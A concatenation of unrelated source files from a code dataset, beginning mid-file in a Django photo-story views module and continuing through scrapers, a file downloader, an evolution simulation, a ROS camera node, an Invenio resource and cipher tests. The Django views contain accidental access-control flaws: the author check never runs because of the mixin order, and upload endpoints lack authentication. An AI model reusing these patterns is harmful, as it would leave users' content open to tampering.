request.FILES)\n photo_story = PhotoStory()\n story_form = PhotoStoryForm(request.POST)\n if form.is_valid() and story_form.is_valid():\n # save story\n photo_story.story_title = story_form.cleaned_data.get('story_title', None)\n photo_story.story_content = story_form.cleaned_data.get('story_content', None)\n photo_story.user = request.user\n photo_story.save(PhotoStory)\n # save pics\n photo = Photo()\n photo.file = form.cleaned_data['file']\n photo.title_of_the_picture = form.cleaned_data['title_of_the_picture']\n photo.describe_the_picture = form.cleaned_data['describe_the_picture']\n photo.photo_story = PhotoStory.objects.latest('uploaded_at')\n print(photo.title_of_the_picture, 'photo')\n photo.save(Photo)\n create_action(request.user, 'Posted a new Photo Story on', photo_story)\n Tracker.objects.create_from_request(request, photo_story)\n Tracker.objects.filter(Q(device='Other') | Q(device_type='bot') | Q(device='Spider')).delete()\n context = {\n 'story': PhotoStory.objects.latest('uploaded_at'),\n 'photos': Photo.objects.filter(photo_story=PhotoStory.objects.latest('uploaded_at').id)\n\n }\n return render(request, 'blog/photo_gallery.html', context)\n\n return render(request, 'blog/upload_images.html', context)\n\n\n@login_required\ndef make_photo_story(request):\n context = {\n 'form': PhotoForm(),\n 'story_form': PhotoStoryForm(),\n }\n if request.method == \"POST\":\n form = PhotoStoryForm(request.POST)\n photo_form = PhotoForm(request.POST, request.FILES)\n files = request.FILES.getlist('file')\n if form.is_valid() and photo_form.is_valid():\n new_story = form.save(commit=False)\n new_story.user = request.user\n new_story.save()\n photo_story = PhotoStory.objects.latest('uploaded_at')\n story_title = form.cleaned_data['story_title']\n for file in files:\n new_photo = photo_form.save(commit=False)\n new_photo.photo_story = photo_story\n new_photo.file = file\n new_photo.save()\n create_action(request.user, 'Posted a new Photo Story on', photo_story)\n Tracker.objects.create_from_request(request, photo_story)\n Tracker.objects.filter(Q(device='Other') | Q(device_type='bot') | Q(device='Spider')).delete()\n new_picture_story = PhotoStory.objects.filter(story_title=story_title)\n new_picture_story = new_picture_story.first() if new_picture_story.count()>0 else None\n context = {\n 'story': photo_story,\n 'photos': Photo.objects.filter(photo_story=photo_story.id)\n\n }\n return redirect(new_picture_story)\n\n return render(request, 'blog/upload_images.html', context)\n\n\n@login_required\ndef add_photo_to_story(request, pk):\n story = get_object_or_404(PhotoStory, id=pk)\n context = {\n 'photos': Photo.objects.filter(photo_story_id=story.id),\n 'story': story,\n 'form': PhotoForm(),\n\n }\n if request.method == \"POST\":\n form = PhotoForm(request.POST, request.FILES)\n photo = Photo()\n if form.is_valid():\n for field in request.FILES.keys():\n for form_file in request.FILES.getlist(field):\n new_photo = Photo()\n new_photo.file = form_file\n new_photo.title_of_the_picture = form.cleaned_data['title_of_the_picture']\n new_photo.describe_the_picture = form.cleaned_data['describe_the_picture']\n new_photo.photo_story = story\n new_photo.save(Photo)\n return redirect(story)\n return render(request, 'blog/upload_images.html', context)\n\n\ndef large_file(request, pk):\n story = get_object_or_404(PhotoStory, id=pk)\n context = {\n 'photos': Photo.objects.filter(photo_story_id=story.id),\n 'story': story,\n 'form': PhotoForm(),\n 'story_id': pk,\n\n }\n if request.method == 'POST':\n 
new_photo = Photo()\n new_photo.file = request.POST['file']\n new_photo.title_of_the_picture = request.POST['title_of_the_picture']\n new_photo.describe_the_picture = request.POST['describe_the_picture']\n new_photo.photo_story = story\n new_photo.save(Photo)\n return redirect(story)\n\n return render(request, 'blog/large_upload.html', context)\n\n\ndef large_file_direct(request):\n S3_BUCKET = 'wetoowrite'\n file_name = request.GET['file_name']\n file_type = request.GET['file_type']\n # my_config = Config(\n # region_name='ap-south-1',\n # signature_version='s3v4',\n # )\n\n s3 = boto3.client('s3',\n aws_access_key_id=settings.AWS_ACCESS_KEY_ID,\n aws_secret_access_key=settings.AWS_SECRET_ACCESS_KEY,\n region_name=settings.AWS_S3_REGION_NAME\n )\n\n presigned_post = s3.generate_presigned_post(\n Bucket=S3_BUCKET,\n Key=f'{request.user}/{file_name}',\n Fields={\"acl\": \"public-read\",\n \"Content-Type\": file_type},\n Conditions=[\n {\"acl\": \"public-read\"},\n {\"Content-Type\": file_type},\n ],\n ExpiresIn=3600,\n )\n print(presigned_post)\n response = {\n 'data': presigned_post,\n 'url': 'https://%s.s3.amazonaws.com/%s' % (S3_BUCKET, file_name)\n }\n\n return JsonResponse(response, safe=False)\n\n\ndef update_db(request):\n data = request.POST\n print(data)\n pk = data.get('story_id')\n story = get_object_or_404(PhotoStory, id=int(pk))\n Photo.objects.create(photo_story=story, title_of_the_picture=data.get('title'),\n describe_the_picture=data.get('description'),\n file=data.get('uploadedFile'))\n\n return JsonResponse({'response': 'success'})\n\n\nclass PhotoUpdateView(UpdateView, UserPassesTestMixin, LoginRequiredMixin):\n model = Photo\n form_class = PhotoForm\n template_name_suffix = '_update_form'\n context_object_name = 'object'\n\n # to override author\n def form_valid(self, form):\n form.instance.author = self.request.user\n return super().form_valid(form)\n # to authenticate user and author are same\n\n def test_func(self):\n post = self.get_object()\n if self.request.user == post.author:\n return True\n return False\n\n\nclass StoryUpdateView(UpdateView, UserPassesTestMixin, LoginRequiredMixin):\n model = PhotoStory\n form_class = PhotoStoryForm\n template_name_suffix = '_update_form'\n context_object_name = 'object'\n\n # to override author\n def form_valid(self, form):\n form.instance.author = self.request.user\n return super().form_valid(form)\n # to authenticate user and author are same\n\n def test_func(self):\n post = self.get_object()\n if self.request.user == post.author:\n return True\n return False\n\n\ndef photo_story_view(request, pk, tale, author, year, month, day):\n story = PhotoStory.objects.get(id=pk)\n\n photos = Photo.objects.filter(photo_story_id=story.id)\n Tracker.objects.create_from_request(request, story)\n Tracker.objects.filter(Q(device='Other') | Q(device_type='bot') | Q(device='Spider')).delete()\n pic_list = []\n video_list = []\n if photos.count() > 0:\n for photo in photos:\n file_name = photo.file\n if str(file_name).endswith('mp4') or str(file_name).endswith('webm'):\n video_list.append(photo)\n else:\n pic_list.append(photo)\n context = {\n 'photos': pic_list if len(pic_list) > 0 else None,\n 'videos': video_list if len(video_list) > 0 else None,\n 'story': story,\n }\n return render(request, 'blog/photo_gallery.html', context)\n\n\n@login_required\ndef clear_database(request, pk, story_pk):\n Photo.objects.get(id=pk).delete()\n return redirect('upload-images', story_pk)\n\n\n@login_required\ndef delete_story(request, pk):\n story = 
PhotoStory.objects.get(id=pk)\n Tracker.objects.create_from_request(request, story)\n try:\n tgt = ContentType.objects.get_for_model(PhotoStory)\n action = Action.objects.get(target_id=story.id, target_ct=tgt.id)\n action.delete()\n except:\n pass\n story.delete()\n messages.success(request, f'{story.story_title} deleted')\n return redirect('picture-story-list')\n","repo_name":"rajesitb/wetoowrite","sub_path":"blog/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":35710,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"1631486247","text":"import requests\nimport random\nimport time\nfrom lxml import etree\n\n\nsession = requests.Session()\nheaders = {\"User-Agent\":\"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_5) AppleWebKit 537.36 (KHTML, like Gecko) Chrome\",\n \"Accept\":\"text/html,application/xhtml+xml,application/xml; q=0.9,image/webp,*/*;q=0.8\"}\n\ndef getPages(info):\n lists = [info]\n url, category = info.split(\",\", maxsplit = 1)[0], info.split(\",\", maxsplit = 1)[1]\n body = session.get(url, headers=headers).text\n pageNum = etree.HTML(body).xpath('//*[@id=\"searchResultListDiv\"]/div[4]/label/b')[0].text\n n = int(pageNum)\n if n > 1:\n for i in range(2, n+1):\n lists.append(url + \"page\" + str(i) + \"/,\" + category)\n time.sleep(random.randrange(2, 3))\n return lists\n\n\ndef genInputs(filenames):\n with open(filenames) as data:\n for i in data:\n i = i.strip()\n for j in getPages(i):\n with open(\"inputs\", \"a\") as output:\n print(j, file = output)\n print(j)\n\nif __name__ == \"__main__\":\n try:\n genInputs(\"pages\")\n except Exception as e:\n print(str(e))\n","repo_name":"JinkeCao/MMA-Category-Info","sub_path":"sephora/2_gen_pages.py","file_name":"2_gen_pages.py","file_ext":"py","file_size_in_byte":1158,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"11930869477","text":"import os\r\nimport requests\r\n\r\n\r\ndef download_file(url, path):\r\n \"\"\"Baixa um arquivo da URL especificada e o salva no caminho especificado\"\"\"\r\n try:\r\n response = requests.get(url)\r\n response.raise_for_status()\r\n except requests.exceptions.RequestException as e:\r\n print(f\"Erro de rede: {e}\")\r\n return\r\n\r\n if os.path.exists(path):\r\n overwrite = input(f\"O arquivo {path} já existe. Deseja sobrescrevê-lo? 
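A possible client-side counterpart to the `large_file_direct` view in `blog/views.py` above: post the file straight to S3 using the presigned fields that the view returns. This is a hedged sketch, not part of the repository; `resp` stands for the parsed JSON the view sends back.

```python
import requests

def upload_via_presigned(resp, filepath):
    post = resp['data']  # {'url': ..., 'fields': {...}} from generate_presigned_post
    with open(filepath, 'rb') as f:
        # the form fields must precede the file part in the multipart body
        r = requests.post(post['url'], data=post['fields'], files={'file': f})
    r.raise_for_status()
    return resp['url']
```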
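The upload views above re-query `PhotoStory.objects.latest('uploaded_at')` to link photos, which can attach files to the wrong story under concurrent uploads. A minimal sketch of the same multi-file flow that keeps the saved instance instead; `PhotoStoryForm`, `PhotoForm` and `redirect` come from the module above, the view name is illustrative.

```python
from django.contrib.auth.decorators import login_required
from django.shortcuts import redirect

@login_required
def make_photo_story_safe(request):
    if request.method == "POST":
        form = PhotoStoryForm(request.POST)
        photo_form = PhotoForm(request.POST, request.FILES)
        if form.is_valid() and photo_form.is_valid():
            story = form.save(commit=False)
            story.user = request.user
            story.save()  # reuse this instance; no .latest() lookup needed
            for f in request.FILES.getlist('file'):
                photo = photo_form.save(commit=False)
                photo.pk = None          # force a fresh row per uploaded file
                photo.photo_story = story
                photo.file = f
                photo.save()
            return redirect(story)
```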
(S/N): \")\r\n if overwrite.upper() != 'S':\r\n print(\"Operação cancelada\")\r\n return\r\n\r\n try:\r\n with open(path, 'wb') as f:\r\n f.write(response.content)\r\n print(f\"Arquivo salvo em {path}\")\r\n except IOError as e:\r\n print(f\"Erro ao salvar arquivo: {e}\")\r\n except Exception as e:\r\n print(f\"Erro desconhecido: {e}\")\r\n\r\n\r\nif __name__ == '__main__':\r\n try:\r\n url = input(\"Digite a URL do arquivo a ser baixado: \")\r\n path = input(\"Digite o caminho do arquivo para salvar (incluindo o nome do arquivo): \")\r\n download_file(url, path)\r\n except Exception as e:\r\n print(f\"Erro desconhecido: {e}\")\r\n","repo_name":"alanhcc/ferramentas-pentester","sub_path":"ferramentas/baixaaquivo/baixar.py","file_name":"baixar.py","file_ext":"py","file_size_in_byte":1148,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73668575184","text":"import pygame\nimport random\nimport pickle\nfrom random import random, seed, randrange, choices\nfrom math import exp\nimport numpy as np\nfrom brain import Brain\nfrom organism import Organism\nfrom datetime import datetime\nfrom replaydata import ReplayData\n\n\"\"\"\n********************************************************************************************\ncreate a draw data file based upon the current replay data recived\ndelete env .py as an when we are done with the drawing function\nthere is no use of env file currently\nsame case with display replay\nnow all simation/pickle dumping/ replaying will be done in main file\n********************************************************************************************\n\"\"\"\n\n\nclass Evolution:\n def __init__(self, gridsize, no_of_steps, no_of_gens, no_of_inputs, no_of_hidden, no_of_outputs, mutation_factor):\n self.mutation_factor = [i for i in range(mutation_factor)]\n self.no_of_inputs = no_of_inputs\n self.no_of_hidden = no_of_hidden\n self.no_of_outputs = no_of_outputs\n self.circle_size = 4 # deprected\n self.organisms = []\n self.replaydump = None# deprecated\n self.gridsize = gridsize\n self.no_of_organisms = gridsize\n self.envgrid = [[False for i in range(gridsize)] for j in range(gridsize)]\n self.no_of_steps = no_of_steps\n self.no_of_gens = no_of_gens\n self.replay = [] # deprectaed\n self.input = [0, 0] # del this later just a temp fix need to take input dynamically from the env\n\n def object_to_color(self,object):\n h = hash(object)\n return (h%1000%255,h%1000000//1000%255,h%1000000000//1000000%255)\n\n def populate_env(self): \n i = 0\n while i < self.no_of_organisms:\n seed(datetime.now())\n x,y = randrange(0, self.gridsize-1), randrange(0, self.gridsize -1)\n if not self.envgrid[x][y]:\n seed(datetime.now())\n brain = Brain(self.no_of_inputs, self.no_of_hidden, self.no_of_outputs)\n self.envgrid[x][y] = True\n self.organisms.append(Organism(self.object_to_color(brain), (x,y), brain))\n i += 1\n print(\"Done populating environment : \")\n\n def survial_check(self):\n for organism in self.organisms:\n if organism.pos[0] > self.gridsize/4 and organism.pos[1] > self.gridsize/4:\n self.envgrid[organism.pos[0]][organism.pos[1]] = False\n self.organisms.remove(organism)\n print('Done survival check deleted unfit organisms :')\n\n def genome_combiner(self, parent_a, parent_b):\n #complex shot do not change\n new_brain = Brain(self.no_of_inputs, self.no_of_hidden, self.no_of_outputs)\n brain_a = parent_a.brain\n brain_b = parent_b.brain\n temp_var = [1, -1]\n for layer in range(len(brain_a.network)):\n for 
neuron in range(len(brain_a.network[layer])):\n for weight in range(len(brain_a.network[layer][neuron]['weights'])):\n seed(datetime.now())\n direction = choices(temp_var)\n mutation_weight = choices(self.mutation_factor)\n multiplicative_factor = 1 + (direction[0] * mutation_weight[0])/100\n new_brain.network[layer][neuron]['weights'][weight] = ((brain_a.network[layer][neuron]['weights'][weight] * multiplicative_factor) + (brain_b.network[layer][neuron]['weights'][weight] * multiplicative_factor))/2\n return new_brain\n \n def repopulate(self):\n new_generation = []\n self.envgrid = [[False for i in range(self.gridsize)] for j in range(self.gridsize)]\n while len(new_generation) < self.no_of_organisms:\n seed(datetime.now())\n x,y = randrange(0, self.gridsize-1), randrange(0, self.gridsize -1)\n if not self.envgrid[x][y]:\n parent_a, parent_b = choices(self.organisms, k = 2)\n new_organism_brain = self.genome_combiner(parent_a, parent_b)\n new_color = [(parent_a.color[i] + parent_b.color[i])/2 for i in range(len(parent_a.color))]\n new_organism = Organism(self.object_to_color(new_organism_brain), (x,y), new_organism_brain)\n new_generation.append(new_organism)\n self.envgrid[x][y] = True\n self.organisms = new_generation\n print('Done repopulating')\n\n def evolve(self):\n self.generations = []\n for gen in range(self.no_of_gens):#single gen\n # this loop perfroms set tranformations for given no of steps\n self.steps = []\n for step in range(self.no_of_steps): # single step \n # this for loop is perfroming transformation on over organisms\n temp_pos = []\n for organism in self.organisms:\n previous_pos = organism.pos\n brain_input = (organism.pos[0]- self.gridsize/2, organism.pos[1] - self.gridsize/2)\n brain_input = self.input\n direction = organism.brain.forward_propogate(brain_input)\n if organism.move(direction, self.envgrid):\n self.envgrid[previous_pos[0]][previous_pos[1]] = False\n self.envgrid[organism.pos[0]][organism.pos[1]] = True\n temp_pos.append(ReplayData(organism.pos, organism.color))\n self.steps.append(temp_pos)\n #print('In step : ',step, self.organisms[0].pos, self.steps[step][0].pos)\n self.generations.append(self.steps)\n print('Gen : ', gen)\n self.survial_check()\n print('No of survivors : ', len(self.organisms))\n self.repopulate()\n print('Done evolution : ')\n return self.generations\n \n\n\n\n","repo_name":"AyushBobale/Neuro-Evolution","sub_path":"evolution.py","file_name":"evolution.py","file_ext":"py","file_size_in_byte":6088,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"8581988946","text":"#!/usr/bin/env python\nimport os\nimport sys\n\nimport django\nfrom django.conf import settings\n\ntry:\n import licenses\nexcept ImportError:\n licenses = False\n\ntry:\n import photologue\nexcept ImportError:\n photologue = False\n\n\nDEFAULT_SETTINGS = dict(\n INSTALLED_APPS=(\n \"django.contrib.auth\",\n \"django.contrib.contenttypes\",\n \"django.contrib.sites\",\n \"podcasting\",\n \"podcasting.tests\",\n ),\n MIDDLEWARE_CLASSES=[\n \"django.contrib.sessions.middleware.SessionMiddleware\",\n \"django.contrib.auth.middleware.AuthenticationMiddleware\",\n \"django.contrib.messages.middleware.MessageMiddleware\",\n ],\n DATABASES={\n \"default\": {\n \"ENGINE\": \"django.db.backends.sqlite3\",\n \"NAME\": \":memory:\",\n }\n },\n SITE_ID = 1,\n ROOT_URLCONF=\"podcasting.tests.urls\",\n SECRET_KEY=\"notasecret\",\n)\n\nif licenses:\n DEFAULT_SETTINGS[\"INSTALLED_APPS\"] += (\"licenses\",)\n\nif 
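The loops in `evolution.py` above call `seed(datetime.now())` before nearly every draw; seeding once is sufficient, and recent CPython releases reject non-int/str seeds like `datetime` objects outright. A sketch of the same placement logic with a single, independently seeded generator (function and parameter names are illustrative):

```python
import random

def place_organisms(gridsize, count, rng=None):
    rng = rng or random.Random()  # seeded once from OS entropy
    grid = [[False] * gridsize for _ in range(gridsize)]
    placed = []
    while len(placed) < count:
        x, y = rng.randrange(gridsize), rng.randrange(gridsize)
        if not grid[x][y]:        # keep drawing until a free cell is found
            grid[x][y] = True
            placed.append((x, y))
    return grid, placed
```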
photologue:\n DEFAULT_SETTINGS[\"INSTALLED_APPS\"] += (\"photologue\",)\n\ndef runtests(*test_args):\n if not settings.configured:\n settings.configure(**DEFAULT_SETTINGS)\n\n # Compatibility with Django 1.7's stricter initialization\n if hasattr(django, \"setup\"):\n django.setup()\n\n parent = os.path.dirname(os.path.abspath(__file__))\n sys.path.insert(0, parent)\n\n try:\n from django.test.runner import DiscoverRunner\n runner_class = DiscoverRunner\n test_args = [\"podcasting.tests\"]\n except ImportError:\n from django.test.simple import DjangoTestSuiteRunner\n runner_class = DjangoTestSuiteRunner\n test_args = [\"tests\"]\n\n failures = runner_class(verbosity=1, interactive=True, failfast=False).run_tests(test_args)\n sys.exit(failures)\n\n\nif __name__ == \"__main__\":\n runtests(*sys.argv[1:])\n","repo_name":"rizumu/django-podcasting","sub_path":"runtests.py","file_name":"runtests.py","file_ext":"py","file_size_in_byte":1828,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"48"} +{"seq_id":"6662872925","text":"from thinkpol.utils import connection as cn\nfrom thinkpol.protobufs import cortex_pb2\nfrom thinkpol.protobufs import config_pb2\n\n\ndef get_user_msg(r):\n\t\"\"\"\n\tGets a formatted binary message containing user information\n\tfrom a reader object.\n\n\t:param r: the reader object\n\t:type r: Reader\n\t:returns: the formatted binary message\n\t:rtype: bytes\n\t\"\"\"\n\tuser = cortex_pb2.User(\n\t\tuser_id = r.user_id,\n\t\tusername = r.user_name,\n\t\tbirthday = r.birth_date,\n\t\tgender = r.gender\n\t\t)\n\tuser_msg = user.SerializeToString()\n\treturn user_msg\n\n\ndef send_snapshot(user_msg, snapshot, host, port):\n\t\"\"\"\n\tSends a single snapshot of a user's cognition \n\tto server in address host:port.\n\n\t:param user_msg: the serialized binary info of the user who's snapshot we're to send\n\t:type user_msg: bytes \n\t:param snapshot: the snapshot we're to send\n\t:type snapshot: Snapshot\n\t:param host: the host of the server\n\t:type host: str\n\t:param port: the port of the server\n\t:type port: str\n\t\"\"\"\n\twith cn.Connection.connect(host, int(port)) as connection:\n\t\tconnection.send_message(user_msg)\n\t\tconfig_msg = connection.receive_message()\n\t\tconfig = config_pb2.Config()\n\t\tconfig.ParseFromString(config_msg)\n\t\tsnapshot_msg = snapshot.serialize_request(\n\t\t\tconfig.fields\n\t\t\t)\n\t\tconnection.send_message(snapshot_msg)","repo_name":"idodi33/thinkpol","sub_path":"thinkpol/client/client_utils.py","file_name":"client_utils.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"48"} +{"seq_id":"29897667301","text":"n = list(input()) # 입력받은 문자열을 리스트 형태로 변경\nn.sort(reverse=True) # 내림차순으로 정렬\nsum = 0\n\n# 각 자릿수를 더한 합\nfor i in n:\n sum += int(i) # 정수 형태로 변경해서 더함\n\n# 30의 배수의 조건 : 각 자릿수를 더한 값이 3의 배수이고, 끝자리가 0일것\nif sum % 3 != 0 or \"0\" not in n:\n print(-1)\nelse:\n print(''.join(n))","repo_name":"ShShin98/Baekjoon_CodingTest","sub_path":"greedy/#10610 30 (다시).py","file_name":"#10610 30 (다시).py","file_ext":"py","file_size_in_byte":403,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"73112223185","text":"import rclpy\nfrom rclpy.node import Node\n# dependencies rclpy image_transport cv_bridge sensor_msgs std_msgs opencv2\nimport cv2\nimport cv2.aruco\nfrom cv_bridge import CvBridge \nfrom geometry_msgs.msg import TwistStamped\nfrom sensor_msgs.msg 
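`client_utils.py` above depends on a `Connection` helper with `send_message`/`receive_message`, whose implementation is not shown here. A common way to build such a pair is length-prefixed framing over a socket; this is a hedged sketch of that general technique, not the project's actual protocol.

```python
import socket
import struct

def send_message(sock: socket.socket, payload: bytes) -> None:
    # 4-byte little-endian length header followed by the payload
    sock.sendall(struct.pack('<I', len(payload)) + payload)

def receive_message(sock: socket.socket) -> bytes:
    (length,) = struct.unpack('<I', _recv_exact(sock, 4))
    return _recv_exact(sock, length)

def _recv_exact(sock: socket.socket, n: int) -> bytes:
    buf = b''
    while len(buf) < n:
        chunk = sock.recv(n - len(buf))
        if not chunk:
            raise ConnectionError('socket closed mid-message')
        buf += chunk
    return buf
```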
import Image\nfrom std_msgs.msg import Empty, String # For trigger message\nimport numpy as np\nimport time\n#import scipy\n#import skimage\n#from skimage import transform as tf\n\n\nclass ImageGrabber(Node):\n\n def __init__(self):\n super().__init__('image_grabber')\n self.image_publisher = self.create_publisher(Image, \"/image\", 10)\n self.cap = cv2.VideoCapture(f'nvarguscamerasrc sensor-mode=3 ! video/x-raw(memory:NVMM), width=1920, height=1080, format=(string)NV12, framerate=(fraction)29/1 ! nvvidconv ! video/x-raw, width=(int)1920, height=(int)1080, format=(string)BGRx ! videoconvert ! appsink')\n self.image = None\n self.bridge = CvBridge()\n self.current_time = time.time()\n\n if not self.cap.isOpened():\n print(\"Cannot open camera\")\n exit()\n\n def run(self):\n while True:\n ret, frame = self.cap.read()\n print(time.time())\n # if frame is read correctly ret is True\n if not ret:\n print(\"Can't receive frame (stream end?). Exiting ...\")\n break\n \"\"\"\n if time.time() - self.current_time > 5:\n cv2.imwrite(\"/var/www/html/image/image.png\", frame)\n self.current_time = time.time()\n\n self.image = frame\n \"\"\"\n self.image_publisher.publish(self.bridge.cv2_to_imgmsg(frame, \"bgr8\"))\n\ndef main(args=None):\n rclpy.init(args=args)\n\n grabber = ImageGrabber()\n\n grabber.run()\n\n rclpy.spin(grabber)\n\n # Destroy the node explicitly\n # (optional - otherwise it will be done automatically\n # when the garbage collector destroys the node object)\n grabber.destroy_node()\n rclpy.shutdown()\n\n\nif __name__ == '__main__':\n main()","repo_name":"neduchal/lampone23_server","sub_path":"lampone23_server/image_grabber.py","file_name":"image_grabber.py","file_ext":"py","file_size_in_byte":2014,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"4385180066","text":"from flask import g\nfrom flask_resources import Resource, resource_requestctx, response_handler, route\nfrom invenio_records_resources.resources.errors import ErrorHandlersMixin\nfrom invenio_records_resources.resources.records.resource import (\n request_data,\n request_search_args,\n request_view_args,\n)\nfrom invenio_records_resources.resources.records.utils import search_preference\n\n\nclass RecordCommunitiesResource(ErrorHandlersMixin, Resource):\n \"\"\"Record communities resource.\"\"\"\n\n def __init__(self, config, service):\n \"\"\"Constructor.\"\"\"\n super().__init__(config)\n self.service = service\n\n def create_url_rules(self):\n \"\"\"Create the URL rules for the record resource.\"\"\"\n routes = self.config.routes\n url_rules = [\n route(\"GET\", routes[\"list\"], self.search),\n route(\"POST\", routes[\"list\"], self.add_to_published_record),\n route(\"POST\", routes[\"draft-list\"], self.add_to_draft),\n route(\"DELETE\", routes[\"list\"], self.remove),\n ]\n return url_rules\n\n @request_search_args\n @request_view_args\n @response_handler(many=True)\n def search(self):\n \"\"\"Search for record's communities.\"\"\"\n items = self.service.search(\n identity=g.identity,\n id_=resource_requestctx.view_args[\"pid_value\"],\n params=resource_requestctx.args,\n search_preference=search_preference(),\n expand=resource_requestctx.args.get(\"expand\", False),\n )\n return items.to_dict(), 200\n\n @request_view_args\n @response_handler()\n @request_data\n def add_to_published_record(self):\n \"\"\"Include record in communities.\"\"\"\n processed, errors = self.service.add_to_published_record(\n identity=g.identity,\n 
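`image_grabber.py` above hands a GStreamer pipeline string to `cv2.VideoCapture` and relies on backend auto-detection. Passing the backend explicitly fails fast when OpenCV was built without GStreamer support; the pipeline string is shortened here for illustration.

```python
import cv2

pipeline = ('nvarguscamerasrc ! video/x-raw(memory:NVMM), width=1920, height=1080 '
            '! nvvidconv ! video/x-raw, format=BGRx ! videoconvert ! appsink')
cap = cv2.VideoCapture(pipeline, cv2.CAP_GSTREAMER)  # explicit backend
if not cap.isOpened():
    raise RuntimeError('GStreamer pipeline failed to open')
```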
id_=resource_requestctx.view_args[\"pid_value\"],\n data=resource_requestctx.data,\n )\n\n response = {}\n if processed:\n response[\"processed\"] = processed\n if errors:\n response[\"errors\"] = errors\n\n # TODO why not checking errors\n return response, 200 if len(processed) > 0 else 400\n\n @request_view_args\n @response_handler()\n @request_data\n def add_to_draft(self):\n \"\"\"Include record in communities.\"\"\"\n processed, errors = self.service.add_to_draft(\n identity=g.identity,\n id_=resource_requestctx.view_args[\"pid_value\"],\n data=resource_requestctx.data,\n )\n\n response = {}\n if processed:\n response[\"processed\"] = processed\n if errors:\n response[\"errors\"] = errors\n\n # TODO why not checking errors\n return response, 200 if len(processed) > 0 else 400\n\n @request_view_args\n @request_data\n @response_handler()\n def remove(self):\n \"\"\"Remove communities from the record.\"\"\"\n processed, errors = self.service.remove(\n identity=g.identity,\n id_=resource_requestctx.view_args[\"pid_value\"],\n data=resource_requestctx.data,\n )\n\n response = {}\n if errors:\n response[\"errors\"] = errors\n\n return response, 200 if len(processed) > 0 else 400\n","repo_name":"oarepo/oarepo-communities","sub_path":"oarepo_communities/resources/record_communities/resource.py","file_name":"resource.py","file_ext":"py","file_size_in_byte":3236,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"48"} +{"seq_id":"31288972879","text":"\"\"\"Unit Tests for the Caesar Cipher\"\"\"\nimport unittest\nfrom .context import caesar, cipher_exceptions\n\n\nclass CaesarCipherTest(unittest.TestCase):\n \"\"\"Unit Test Class\"\"\"\n\n MESSAGE_TO_ENCRYPT = \"This is my original message!\"\n MESSAGE_TO_DECRYPT = \"'uvF7vF7zL7BEvtvAny7zrFFntr.\"\n MESSAGE_TO_DECRYPT_SIMPLE_MODE = \"Guvf vf zl bevtvany zrffntr!\"\n KEY = 13\n\n def test_encrypt(self):\n \"\"\"Test the result of an encryption\"\"\"\n cipher = caesar.CaesarCipher(simple=False)\n encrypted_message = cipher.encrypt(self.MESSAGE_TO_ENCRYPT, self.KEY)\n self.assertEqual(encrypted_message, self.MESSAGE_TO_DECRYPT)\n\n def test_encrypt_simple(self):\n \"\"\"Test the result of an encryption using Simple mode\"\"\"\n cipher = caesar.CaesarCipher()\n encrypted_message = cipher.encrypt(self.MESSAGE_TO_ENCRYPT, self.KEY)\n self.assertEqual(\n encrypted_message,\n self.MESSAGE_TO_DECRYPT_SIMPLE_MODE\n )\n\n def test_decrypt_simple(self):\n \"\"\"Test the result of a decryption\"\"\"\n cipher = caesar.CaesarCipher()\n decrypted_message = cipher.decrypt(\n self.MESSAGE_TO_DECRYPT_SIMPLE_MODE,\n self.KEY\n )\n self.assertEqual(decrypted_message, self.MESSAGE_TO_ENCRYPT)\n\n def test_decrypt(self):\n \"\"\"Test the result of a decryption\"\"\"\n cipher = caesar.CaesarCipher(simple=False)\n decrypted_message = cipher.decrypt(self.MESSAGE_TO_DECRYPT, self.KEY)\n self.assertEqual(decrypted_message, \"This is my original message!\")\n\n def test_encrypt_method_incorrect_message(self):\n \"\"\"\n Test that the encrypt method raises\n an Exception if the message is incorrect\n \"\"\"\n with self.assertRaises(cipher_exceptions.IncorrectMessageError):\n caesar.CaesarCipher().encrypt(1, 13)\n\n def test_encrypt_method_incorrect_key(self):\n \"\"\"\n Test that the encrypt method raises\n an Exception if the key is incorrect\n \"\"\"\n with self.assertRaises(cipher_exceptions.IncorrectCipherKeyError):\n caesar.CaesarCipher().encrypt(\"This is another message\", \"a\")\n\n def 
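`create_url_rules()` in the resource above expects `self.config.routes` to provide `"list"` and `"draft-list"` keys. A hedged sketch of a matching resource config; the real config class shipped with the package may differ, and the URL patterns here are assumptions.

```python
from invenio_records_resources.resources import RecordResourceConfig

class RecordCommunitiesResourceConfig(RecordResourceConfig):
    """Routes consumed by RecordCommunitiesResource.create_url_rules()."""
    blueprint_name = "record_communities"
    url_prefix = "/records"
    routes = {
        "list": "/<pid_value>/communities",
        "draft-list": "/<pid_value>/draft/communities",
    }
```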
test_decrypt_method_incorrect_message(self):\n \"\"\"\n Test that the decrypt method raises\n an Exception if the message is incorrect\n \"\"\"\n with self.assertRaises(cipher_exceptions.IncorrectMessageError):\n caesar.CaesarCipher().decrypt(1, 13)\n\n def test_decrypt_method_incorrect_key(self):\n \"\"\"\n Test that the decrypt method raises\n an Exception if the key is incorrect\n \"\"\"\n with self.assertRaises(cipher_exceptions.IncorrectCipherKeyError):\n caesar.CaesarCipher().decrypt(\"This is another message\", \"a\")\n\n def test_init_incorrect_symbols_list(self):\n \"\"\"\n Test that the init method raises\n an Exception if the symbols argument is incorrect\n \"\"\"\n with self.assertRaises(ValueError):\n caesar.CaesarCipher(simple=False, symbols=123)\n\n def test_cipher_incorrect_mode(self):\n \"\"\"\n Test that the cipher method raises\n an Exception if the mode argument is incorrect\n \"\"\"\n with self.assertRaises(ValueError):\n cipher = caesar.CaesarCipher()\n cipher.cipher(\"My message\", 2, mode=\"incorrect cipher type\")\n\n def test_reversible(self):\n \"\"\"Test that an encrypted message can be derypted with the same key\"\"\"\n 